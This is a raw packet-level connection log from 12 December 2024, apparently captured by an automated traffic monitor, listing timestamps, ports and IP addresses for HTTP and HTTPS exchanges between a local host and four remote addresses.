Dec 12, 2024 16:48:18.908991098 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.909017086 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.909094095 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.910063028 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.910110950 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.910154104 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.910196066 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.911134958 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.911201954 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.911251068 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.911289930 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.912199020 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.912305117 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.912352085 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.913274050 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.913314104 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.913361073 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.913399935 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.914325953 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.914448023 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.914493084 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.915393114 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.915441990 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.915472031 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.915518045 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.916619062 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.916654110 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.916728973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.916728973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.917503119 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.917588949 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.917637110 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.918610096 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.918658972 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.918688059 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.919581890 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.919729948 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.919785023 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.919847012 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.919892073 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.920706987 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.920753956 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.920779943 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.920824051 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.921766996 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.921812057 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.921865940 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.921907902 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.922800064 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.922879934 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.922923088 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.922960997 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.923942089 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.927561045 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.059767008 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.059871912 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.059925079 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.060240030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.060292959 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.060364008 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.060424089 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.061393023 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.061438084 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.061542034 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.061587095 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.062367916 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.062412977 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.062501907 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.062546015 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.063420057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.063469887 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.063530922 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.064528942 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.064579010 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.064603090 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.064646959 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.065592051 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.065639973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.065704107 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.065747023 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.066632032 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.066684961 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.066740036 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.066781998 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.067708015 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.067845106 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.067890882 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.068768024 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.068814993 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.068845034 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.068886995 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.069936991 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.069983006 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.069999933 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.070041895 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.070861101 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.070904970 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.070934057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.070974112 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.071916103 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.072011948 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.072072983 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.073110104 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.073153973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.073288918 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.073332071 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.074047089 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.074090958 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.074157000 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.074199915 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.075098991 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.075154066 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.075190067 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.075234890 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.076209068 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.076297998 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.076359034 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.077234983 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.077280998 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.077359915 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.077403069 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.078398943 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.078444958 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.078519106 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.078561068 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.079394102 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.079500914 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.079551935 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.080413103 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.080460072 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.080657005 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.080701113 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.081532001 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.081588030 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.081676960 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.081717014 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.082617998 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.082664013 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.082784891 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.082828999 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.083630085 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.083683968 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.083734035 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.084645987 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.084711075 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.084744930 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.084789038 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.085731983 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.085782051 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.085844040 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.085891008 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.086806059 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.086858034 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.086922884 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.086968899 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.087821007 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:19.087882996 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:19.330770969 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:19.330790043 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:19.331785917 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:19.331904888 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:19.333883047 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:19.375359058 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:19.876992941 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:19.877072096 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:19.881278992 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:19.881289959 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:19.881580114 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:19.881632090 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:19.882045031 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:19.923331022 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:20.070830107 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:20.070970058 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:20.070986986 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:20.071046114 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:20.071190119 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:20.071234941 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:20.071335077 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:20.075341940 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:20.075419903 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:20.075536966 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:20.075886011 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:20.075916052 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:21.338228941 CET	49868	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:21.338628054 CET	49884	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:21.458343983 CET	80	49884	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:21.458416939 CET	80	49868	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:21.458419085 CET	49884	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:21.458489895 CET	49868	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:21.459445953 CET	49884	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:21.579195976 CET	80	49884	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:21.769948006 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:21.770128012 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:21.927500010 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:21.927514076 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:21.927845001 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:21.927896023 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:21.975285053 CET	49883	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:22.015332937 CET	443	49883	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:22.094912052 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:22.094948053 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:22.095055103 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:22.107211113 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:22.107227087 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:22.811506987 CET	80	49884	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:22.811574936 CET	49884	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:22.814153910 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:22.814436913 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:22.934129000 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:22.934448004 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:22.934582949 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:22.937774897 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:22.948869944 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:23.068628073 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:23.343727112 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.343828917 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.358963013 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.359061956 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.463284969 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.463370085 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.467381954 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.467483044 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.468605995 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.468684912 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.536170959 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.538678885 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.540261030 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.540313005 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.540326118 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.541785002 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.545669079 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.545744896 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.553278923 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.554574013 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.554584980 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.554625988 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.562437057 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.566359043 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.566365004 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.566414118 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.571471930 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.573765993 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.578727961 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.582317114 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.582494020 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.582544088 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.592171907 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.594177008 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.595122099 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.595172882 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.605880022 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.610358953 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.610378027 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.610430002 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.619697094 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.623614073 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.623625994 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.623671055 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.633116961 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.633872032 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.636115074 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.636189938 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.646812916 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.649787903 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.649818897 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.649866104 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.660511971 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.661803007 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.661809921 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.661853075 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.674159050 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.677886009 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.700359106 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.702538013 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.702567101 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.702626944 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.728389978 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.728596926 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.728612900 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.728655100 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.730386019 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.731583118 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.734838009 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.738782883 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.738818884 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.738878012 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.738889933 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.738909960 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.738929033 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.749011993 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.749063969 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.749144077 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.749155998 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.749195099 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.760159969 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.763612986 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.763627052 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.763668060 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.770874023 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.771737099 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.771764994 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.771821022 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.780517101 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.780589104 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.780775070 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.780852079 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.790683031 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.790738106 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.790745974 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.790811062 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.800872087 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.800939083 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.801053047 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.801110029 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.804677963 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:23.804889917 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:23.805800915 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:23.805897951 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:23.809654951 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:23.809664965 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:23.810066938 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:23.810163021 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:23.810898066 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.810961008 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.810970068 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.811012983 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.811976910 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:23.820962906 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.821031094 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.821044922 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.821083069 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.831119061 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.831197023 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.831228971 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.831340075 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.840692997 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.840769053 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.840815067 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.840862036 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.849591017 CET	443	49878	172.217.17.65	192.168.2.10
